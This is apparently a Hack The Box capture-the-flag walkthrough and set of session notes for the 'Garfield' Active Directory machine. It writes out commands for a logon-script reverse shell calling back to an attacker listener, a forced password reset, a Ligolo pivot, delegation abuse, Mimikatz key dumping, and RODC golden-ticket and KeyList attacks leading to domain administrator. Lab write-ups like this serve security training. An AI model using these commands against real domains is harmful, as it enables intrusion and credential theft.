Garfield Walkthrough - HTB Hard

Technical Walkthrough

Garfield Walkthrough - HTB Hard

Machine Info

• Name: Garfield
• OS: Windows (Active Directory)
• Difficulty: Hard
• Creator: ruycr4ft
• Released: 2026-04-04
• Domain: garfield.htb
• DC: DC01.garfield.htb (<TARGET>)
• Internal: RODC01.garfield.htb (<TARGET>)

Phase A: Baseline AD Enum + scriptPath Foothold

Step 1: Initial Validation

# Add hosts
echo '<TARGET> DC01.garfield.htb garfield.htb' >> /etc/hosts

# Sync time (critical for Kerberos)
sudo ntpdate <TARGET>

# Validate credentials
nxc smb <TARGET> -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978'
# [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978

Step 2: AD Enumeration

# Shares (NETLOGON/SYSVOL readable)
nxc smb <TARGET> -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --shares

# Users (7 total: Administrator, Guest, krbtgt, krbtgt_8245, j.arbuckle, l.wilson, l.wilson_adm)
nxc ldap <TARGET> -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --users

# BloodHound collection (2 computers: DC01, RODC01)
bloodhound-python -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' -d garfield.htb -ns <TARGET> -dc DC01.garfield.htb -c All

# Verify j.arbuckle's write rights
bloodyad ... get writable --detail
# Result: scriptPath WRITE on l.wilson AND l.wilson_adm

• l.wilson: Remote Management Users, Remote Desktop Users
• l.wilson_adm: Tier 1, Remote Management Users, Remote Desktop Users
• krbtgt_8245 exists (RODC KDC service account)
• j.arbuckle can write to SYSVOL/garfield.htb/scripts/ (but NOT NETLOGON directly)

Step 3: scriptPath Logon Script Exploit

# Create self-contained base64 reverse shell .bat
# PowerShell TCPClient reverse shell encoded in UTF-16LE base64
cat > pwn.bat << 'EOF'
@echo off
powershell -ep bypass -nop -w hidden -e <base64_revshell_to_10.10.14.53:9001>
EOF

# Upload to SYSVOL scripts (NETLOGON maps to this path)
smbclient //DC01.garfield.htb/SYSVOL -U 'garfield.htb/j.arbuckle%Th1sD4mnC4t!@1978' \
  -c 'put pwn.bat garfield.htb/scripts/pwn.bat'

# Set l.wilson's scriptPath
bloodyad -d garfield.htb -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --host DC01.garfield.htb \
  set object l.wilson scriptPath -v 'printerDetect.bat'

# Also overwrite printerDetect.bat with payload (belt+suspenders)
smbclient //DC01.garfield.htb/SYSVOL -U 'garfield.htb/j.arbuckle%Th1sD4mnC4t!@1978' \
  -c 'put pwn.bat garfield.htb/scripts/printerDetect.bat'

# Start listener
nc -lvnp 9001
# Wait ~3-5 minutes for l.wilson logon simulation
# connect to [<TARGET>] from (UNKNOWN) [<TARGET>] 60528
# garfield\l.wilson on DC01

Step 4: l.wilson -> l.wilson_adm (Password Reset)

# From l.wilson shell - net user DOES NOT WORK (Access Denied)
# Must use Set-ADAccountPassword (ForceChangePassword extended right)
Set-ADAccountPassword -Identity l.wilson_adm -Reset -NewPassword (ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force)

Verify:

nxc winrm DC01.garfield.htb -u 'l.wilson_adm' -p 'P@ssw0rd123!'
# [+] garfield.htb\l.wilson_adm:P@ssw0rd123! (Pwn3d!)

evil-winrm -i DC01.garfield.htb -u l.wilson_adm -p 'P@ssw0rd123!'

Step 5: User Flag

type C:\Users\l.wilson_adm\Desktop\user.txt
# <hash redacted>

Step 6: Platform Baseline

• Hostname: DC01
• Domain: garfield.htb
• External IP: <TARGET>/16
• Internal IP: <TARGET>/24 (Hyper-V vEthernet Switch01)
• l.wilson_adm groups: Tier 1, Remote Management Users, Remote Desktop Users
• l.wilson_adm privileges: SeMachineAccountPrivilege (add machine accounts)
• ACL on RODC01$: WriteProperty x2 + ExtendedRight for l.wilson_adm
• RODC01 reachability: <TARGET> ports 445 and 5985 OPEN from DC01
• Domain SID: <secret redacted>
• RODC01 SID: ...1602
• RODC krbtgt: krbtgt_8245

Phase B: Pivot + RBCD + RODC Compromise

Step 7: Ligolo Pivot

# Pwnbox
./proxy -selfcert -laddr <TARGET>:11601

# DC01, via WinRM
C:\Windows\Temp\agent.exe -connect <TARGET>:11601 -ignore-cert

# Pwnbox
sudo ip route replace <TARGET>/24 dev ligolo
nc -vz <TARGET> 445
nc -vz <TARGET> 5985

Step 8: RBCD to RODC01

impacket-addcomputer 'garfield.htb/l.wilson_adm:P@ssw0rd123!' \
  -computer-name 'FAKE01$' -computer-pass 'FakePass123!' -dc-ip <TARGET>

impacket-rbcd -delegate-from 'FAKE01$' -delegate-to 'RODC01$' -action write \
  'garfield.htb/l.wilson_adm:P@ssw0rd123!' -dc-ip <TARGET>

impacket-getST 'garfield.htb/FAKE01$:FakePass123!' \
  -spn cifs/RODC01.garfield.htb -impersonate Administrator -dc-ip <TARGET>

<secret redacted>=Administrator.ccache impacket-psexec -k -no-pass \
  -target-ip <TARGET> RODC01.garfield.htb 'whoami'
# nt authority\system

Recovery Note: RODC01 Secure Channel

The previous run reset RODC01$ in AD only, which caused DC-issued RBCD tickets to fail on RODC01. Recovery was:

# Run from RODC01 SYSTEM
netdom resetpwd /server:DC01.garfield.htb /userd:GARFIELD\l.wilson_adm /<password redacted>:P@ssw0rd123!
nltest /sc_verify:garfield.htb

Evidence: loot/rodc-reset-secure-channel.txt.

Phase C: KeyList Attack + Root Flag

Step 9: Dump krbtgt_8245 AES Material

C:\Users\l.wilson_adm\Documents\m.exe "privilege::debug" `
  "lsadump::lsa /inject /name:krbtgt_8245" "exit"

Important detail: lsadump::lsa /patch only showed NTLM. The /inject /name:krbtgt_8245 form returned the AES keys needed for clean KeyList.

Evidence: loot/mimikatz-rodc01-krbtgt8245-aes-attempt.txt.

Step 10: Fix RODC Administration and PRP

The missing step was that RODC01 managedBy was empty. l.wilson_adm could set it to RODC Administrators, and after that the PRP cmdlets worked.

$rodc = "CN=RODC01,OU=Domain Controllers,DC=garfield,DC=htb"
$grp = "CN=RODC Administrators,CN=Users,DC=garfield,DC=htb"
Set-ADObject $rodc -Replace @{managedBy=$grp}

<password redacted> -Identity RODC01 -AllowedList Administrator
<password redacted> -Identity RODC01 `
  -DeniedList "Denied RODC Password Replication Group","Administrators" -Confirm:$false

Evidence:

• enum/try-set-rodc01-managedby-rodcadmins.txt
• enum/prp-mutation-after-managedby.txt

Step 11: RODC Golden Ticket + KeyList

Rubeus.exe golden /rodcNumber:8245 /aes256:<krbtgt_8245_AES256> `
  /user:Administrator /id:500 /domain:garfield.htb `
  /sid:<secret redacted> `
  /flags:forwardable,renewable,enc_pa_rep /outfile:admin_rodc.kirbi

Rubeus.exe asktgs /keyList /service:krbtgt/garfield.htb `
  /ticket:<admin_rodc_ticket> /dc:DC01.garfield.htb /enctype:aes256 /nowrap

The KeyList response returned Administrator key material. Raw output is stored in loot/rubeus-keylist-admin-current-aes-after-prp.txt.

Step 12: Root

nxc winrm <TARGET> -d garfield.htb -u Administrator -H <administrator_ntlm> \
  -X 'hostname; whoami; Get-Content C:\Users\Administrator\Desktop\root.txt'

Root flag is stored in loot/root.txt. Raw command output is stored in loot/read-root-administrator-winrm.txt.

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

• Target: <TARGET> (DC01.garfield.htb)
• Domain: garfield.htb
• Difficulty: Hard
• Pwnbox: <TARGET> (profex0r / jennofrie)
• VPN IP: <TARGET>
• Started: 2026-05-05

Evidence Ledger

Attack Map

Hosts

Services

Credentials

Domain Info

• Domain: garfield.htb
• Domain SID: <secret redacted>
• DC01 SID: (domain controller)
• RODC01 SID: <secret redacted>
• RODC krbtgt account: krbtgt_8245 (confirmed via LDAP enum)
• l.wilson SID: <secret redacted>
• l.wilson_adm SID: <secret redacted>

Users

Attack Paths

Trust Edges

[Pwnbox <TARGET>] --VPN--> [DC01 <TARGET>]

[DC01 <TARGET>] --Hyper-V vSwitch01--> [RODC01 <TARGET>]

Session Resume

Last updated: 2026-05-06 - ROOT CAPTURED

Current Access

• Administrator on DC01 confirmed via WinRM. Administrator key material is stored in loot/rubeus-keylist-admin-current-aes-after-prp.txt; do not paste into summaries.
• l.wilson_adm remains valid on DC01 and was used for AD changes.
• RODC01 SYSTEM is available via repaired RBCD path using FAKE01$.
• User flag is in loot/user.txt; root flag is in loot/root.txt.

Session Registry

Confirmed Chain

1. Domain validated: garfield.htb, DC01, Windows Server 2019
2. j.arbuckle credentials confirmed valid
3. BloodHound data collected (2 computers, 8 users, 55 groups)
4. j.arbuckle -> l.wilson scriptPath write <secret redacted>
5. Logon script uploaded to SYSVOL, scriptPath set, shell received as l.wilson
6. l.wilson -> l.wilson_adm password reset via Set-ADAccountPassword <secret redacted>
7. WinRM as l.wilson_adm <secret redacted> (Pwn3d)
8. User flag captured and stored in loot/user.txt
9. l.wilson_adm in Tier 1 group, has SeMachineAccountPrivilege
10. l.wilson_adm has WriteProperty + ExtendedRight on RODC01$ (RBCD ready)
11. RODC01 (<TARGET>) reachable on 445 and 5985 from DC01
12. krbtgt_8245 confirmed as RODC KDC account
13. Prior AD-only RODC01$ password reset broke the secure channel; repaired from RODC01 SYSTEM with netdom resetpwd
14. RBCD to RODC01 restored after secure-channel repair
15. managedBy on RODC01 was empty; setting it to RODC Administrators unlocked PRP cmdlets
16. Administrator was added to RODC01 reveal policy and deny groups were removed from RODC01 PRP
17. krbtgt_8245 AES was recovered with Mimikatz lsadump::lsa /inject /name:krbtgt_8245
18. Rubeus KeyList succeeded and returned Administrator key material
19. Administrator WinRM on DC01 confirmed; root flag captured in loot/root.txt

Key Evidence Files

• loot/rodc-reset-secure-channel.txt
• enum/getst-administrator-cifs-rodc01-after-secure-channel-repair.txt
• enum/psexec-rodc01-rbcd-after-secure-channel-repair.txt
• loot/mimikatz-rodc01-krbtgt8245-aes-attempt.txt
• enum/try-set-rodc01-managedby-rodcadmins.txt
• enum/prp-mutation-after-managedby.txt
• loot/rubeus-keylist-admin-current-aes-after-prp.txt
• loot/read-root-administrator-winrm.txt
• loot/root.txt

Blockers

• None for flag capture. Root is complete.

Cleanup Needed (post-engagement)

• Remove pwn.bat from SYSVOL/scripts
• Reset l.wilson scriptPath to empty
• Reset l.wilson_adm scriptPath to empty
• Restore printerDetect.bat original content
• Reset l.wilson_adm password (or document)
• Remove or reset FAKE01$ if desired
• Clear RODC01 RBCD (msDS-AllowedToActOnBehalfOfOtherIdentity)
• Revert RODC01 managedBy to empty if restoring original state
• Revert RODC01 PRP: remove Administrator from reveal policy and restore removed deny groups

Notes

State Mutations Log

Technique Notes

scriptPath Logon Script

• j.arbuckle has WriteProperty on l.wilson's scriptPath attribute
• j.arbuckle can write to \\DC01\SYSVOL\garfield.htb\scripts\ (NETLOGON is read-only)
• Login simulation happens approximately every 5 minutes
• PowerShell base64-encoded payload (-e flag) works; IEX download also works
• The logon simulation triggers on l.wilson (confirmed via callback)
• Self-contained base64 payload is preferable to download-and-exec (faster, no HTTP dependency)

l.wilson -> l.wilson_adm Password Reset

• net user /domain DOES NOT WORK (Access Denied - error 5)
• Set-ADAccountPassword -Identity l.wilson_adm -Reset -NewPassword (...) WORKS
• l.wilson has ForceChangePassword extended right (different from net user admin privileges)

l.wilson_adm -> RODC01 RBCD Rights

• l.wilson_adm has WriteProperty (x2) + ExtendedRight on CN=RODC01,OU=Domain Controllers
• SeMachineAccountPrivilege enables machine account creation
• RBCD (msDS-AllowedToActOnBehalfOfOtherIdentity) can be set on RODC01$

Session 2 - krbtgt_8245 AES256 Recovery Attempt (2026-05-06)

State Mutations (Session 2)

Critical Finding: RODC01$ Password Desync

• The original RODC01$ NTLM (<hash redacted>) from our first dump NO LONGER WORKS for NTLM auth to RODC01
• RODC01$'s machine password rotated naturally between Session 1 (dump worked) and Session 2
• We then RESET RODC01$'s password in AD to "RODCpass123!" - this made things WORSE
• RODC01 still uses its locally-stored rotated password (unknown to us)
• DC01 now encrypts service tickets with the NEW password hash we set
• RODC01 cannot decrypt those tickets because it doesn't know "RODCpass123!"
• Result: <secret redacted> on all RBCD tickets to RODC01

What We Have

• krbtgt_8245 NTLM: <hash redacted> (confirmed from lsadump::lsa /patch on RODC01)
• krbtgt_8245 AES256: MISSING - this is the blocker
• RODC01$ AES256 (old, from LSA dump): <hash redacted>
• RODC01$ NTLM (old): <hash redacted>
• RODC01 local SAM Admin hash: <hash redacted> (does NOT work for domain auth)
• Domain SID: <secret redacted>
• krbtgt_8245 RID: 1603

Plan When Pwnbox Returns

Priority 1: Fix RODC01 Access

The RODC01$'s AD password is "RODCpass123!" but RODC01 doesn't know it.

Options:

1. Wait for RODC01 to replicate from DC01 and accept the new password (may not happen automatically for machine account self-password)
2. Use Invoke-Command from DC01 to RODC01 - l.wilson_adm may not have admin rights on RODC01
3. Force RODC01 to sync: from DC01 as l.wilson_adm, run repadmin /replsingle RODC01 DC01 "DC=garfield,DC=htb" /force
4. Use DC01 to run mimikatz DCSync for krbtgt_8245 (requires Domain Admin on DC01 - we don't have)
5. BEST OPTION: Use Invoke-Command -ComputerName RODC01 -Authentication NegotiateWithImplicitCredential from DC01's WinRM as l.wilson_adm with CredSSP or double-hop workaround

Priority 2: Alternative - Derive AES256 from Known Password

If we can't reach RODC01 but know krbtgt_8245's password, we can COMPUTE the AES256:

• Salt for krbtgt_8245 in AD: <secret redacted>HTBkrbtgt_8245
• Formula: <secret redacted>(password, salt, 4096 iterations, 32 bytes)
• BUT we don't know krbtgt_8245's cleartext password, only its NTLM hash

Priority 3: Alternative - PRP Modification WITHOUT AES256

• The KeyList attack with Impacket's keylistattack.py REQUIRES the RODC krbtgt AES256 key
• But Rubeus golden ticket + keyList request can use RC4 (NTLM) if we set the ticket etype correctly
• Try forging a RODC golden ticket with RC4 key and attempting keyList

Priority 4: Alternative - Skip KeyList Entirely

• If we can modify RODC01's PRP (allow list) to include Administrator
• AND force a password cache on RODC01 for Administrator
• Then dump RODC01's NTDS again (once access is restored) to get Administrator's cached hash
• This requires RODC01 access which is currently blocked

Pwnbox Status

• Pwnbox <TARGET> went <secret redacted> at approximately 09:10 UTC-5 on 2026-05-06
• All tmux sessions, Ligolo tunnel, and listeners are LOST if Pwnbox was recycled
• If recycled: need to re-establish VPN, Ligolo, RBCD, and all tools

Session 3 - Root Completion (2026-05-06)

State Mutations (Session 3)

Critical Root-Cause Fix

• The public chain was correct but one setup edge was missing from prior execution: RODC01 managedBy was empty.
• l.wilson_adm could set RODC01 managedBy to RODC Administrators.
• After managedBy was set and l.wilson_adm was already a member of RODC Administrators, the PRP cmdlets succeeded.
• Key evidence:

- enum/try-set-rodc01-managedby-rodcadmins.txt

- enum/prp-mutation-after-managedby.txt

Kerberos / RODC Findings

• The broken RBCD issue was caused by the AD-only RODC01$ password reset. RODC01 could not decrypt DC-issued service tickets until netdom resetpwd repaired the secure channel.
• A silver ticket with the old local RODC01$ key was enough to regain RODC01 SYSTEM and run netdom resetpwd.
• lsadump::lsa /inject /name:krbtgt_8245 was required to recover AES material; plain lsadump::lsa /patch only showed NTLM.
• Key evidence with raw secrets is stored in loot/:

- loot/rodc-reset-secure-channel.txt

- loot/mimikatz-rodc01-krbtgt8245-aes-attempt.txt

- loot/rubeus-keylist-admin-current-aes-after-prp.txt

Completion

• Rubeus KeyList succeeded after PRP was fixed.
• Administrator WinRM to DC01 was validated.
• Root flag captured and stored in loot/root.txt.

Notes

Scope

• Target: <TARGET> (DC01.garfield.htb)
• Domain: garfield.htb
• Difficulty: Hard
• Pwnbox: <TARGET> (<<secret redacted>> / <<secret redacted>>)
• VPN IP: <TARGET>
• Started: 2026-05-05

Evidence Ledger

Notes

Kill Chain

[DONE] j.arbuckle (given creds)
  -> scriptPath write on l.wilson (bloodyAD)
  -> pwn.bat in NETLOGON -> reverse shell as l.wilson
[DONE] l.wilson
  -> password reset on l.wilson_adm (bloodyAD)
[DONE] l.wilson_adm (WinRM on DC01)
  -> user.txt captured
[NEXT] l.wilson_adm has WriteProperty on RODC01$ (msDS-AllowedToActOnBehalfOfOtherIdentity)
  -> Create machine account FAKE01$
  -> Set RBCD: RODC01$ trusts FAKE01$ for delegation
  -> S4U2Self + S4U2Proxy -> cifs/RODC01.garfield.htb as Administrator
  -> SYSTEM on RODC01
[NEXT] RODC01 SYSTEM
  -> Dump krbtgt_XXXXX AES256 key
  -> Modify PRP (msDS-RevealOnDemandGroup) to allow Administrator
  -> Forge RODC golden ticket
  -> KeyList attack against DC01
  -> Recover Administrator AES/NTLM
[FINAL] Administrator on DC01
  -> root.txt

Infrastructure

Pwnbox (<TARGET>) --[VPN]--> DC01 (<TARGET>)
                                  |
                                  | <TARGET> (internal NIC, Hyper-V)
                                  |
                                  RODC01 (<TARGET>)

Pivot Required

• Ligolo route-style: Pwnbox -> DC01 agent -> <TARGET>/24
• Needed for: RBCD tools (impacket), secretsdump, psexec against RODC01